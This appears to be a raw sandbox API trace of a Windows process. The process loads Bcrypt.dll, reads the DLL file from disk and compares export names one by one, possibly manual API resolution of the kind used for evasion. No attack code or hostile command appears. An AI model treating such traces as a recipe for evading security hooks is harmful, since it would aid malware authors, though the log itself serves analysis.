[0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.884] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0261.885] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0261.885] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0261.885] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0261.885] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0261.886] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0262.130] GetProcessHeap () returned 0x4a0000 [0262.130] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4150040 | out: hHeap=0x4a0000) returned 1 [0262.624] GetProcessHeap () returned 0x4a0000 [0262.624] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b90c0 [0262.626] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0262.634] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0262.634] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0262.634] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0262.635] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0262.635] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0262.635] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0262.635] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0262.635] GetProcessHeap () returned 0x4a0000 [0262.635] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26fa0) returned 0x2d92010 [0262.638] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0262.638] ReadFile (in: hFile=0x15c, lpBuffer=0x2d92010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d92010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0262.643] CloseHandle (hObject=0x15c) returned 1 [0262.644] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0262.644] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0262.644] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0262.644] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0262.644] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.644] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0262.644] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0262.644] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.644] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.644] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0262.644] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0262.644] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0262.645] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0262.645] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.645] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0262.646] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0262.647] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0262.648] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0262.648] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContextFunction") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateContext") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateHash") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCreateMultiHash") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDecrypt") returned 1 [0262.649] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeleteContext") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKey") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptDeriveKeyCapi") returned 0 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunction") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContext") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptConfigureContextFunction") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateContext") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateHash") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptCreateMultiHash") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDecrypt") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeleteContext") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKey") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.650] lstrcmpA (lpString1="BCryptDeriveKeyPBKDF2", lpString2="BCryptDeriveKeyPBKDF2") returned 0 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunction") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContext") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptConfigureContextFunction") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateContext") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateHash") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptCreateMultiHash") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDecrypt") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeleteContext") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKey") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyHash", lpString2="BCryptDestroyHash") returned 0 [0262.651] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunction") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.651] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContext") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptConfigureContextFunction") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateContext") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateHash") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptCreateMultiHash") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDecrypt") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeleteContext") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKey") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyHash") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroyKey", lpString2="BCryptDestroyKey") returned 0 [0262.652] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunction") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.652] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContext") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptConfigureContextFunction") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateContext") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateHash") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptCreateMultiHash") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDecrypt") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeleteContext") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKey") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyHash") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroyKey") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDestroySecret", lpString2="BCryptDestroySecret") returned 0 [0262.653] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunction") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.653] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContext") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateContext") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateHash") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptCreateMultiHash") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDecrypt") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeleteContext") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKey") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyHash") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroyKey") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDestroySecret") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateHash", lpString2="BCryptDuplicateHash") returned 0 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunction") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContext") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptConfigureContextFunction") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateContext") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateHash") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptCreateMultiHash") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDecrypt") returned 1 [0262.806] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeleteContext") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKey") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroyKey") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDestroySecret") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptDuplicateKey", lpString2="BCryptDuplicateKey") returned 0 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunction") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContext") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateContext") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptCreateMultiHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDecrypt") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeleteContext") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKey") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyCapi") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDeriveKeyPBKDF2") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroyKey") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDestroySecret") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateHash") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptDuplicateKey") returned 1 [0262.807] lstrcmpA (lpString1="BCryptEncrypt", lpString2="BCryptEncrypt") returned 0 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunction") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptAddContextFunctionProvider") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContext") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptConfigureContextFunction") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateContext") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateHash") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptCreateMultiHash") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDecrypt") returned 1 [0262.808] lstrcmpA (lpString1="BCryptEnumAlgorithms", lpString2="BCryptDeleteContext") returned 1 [0262.808] 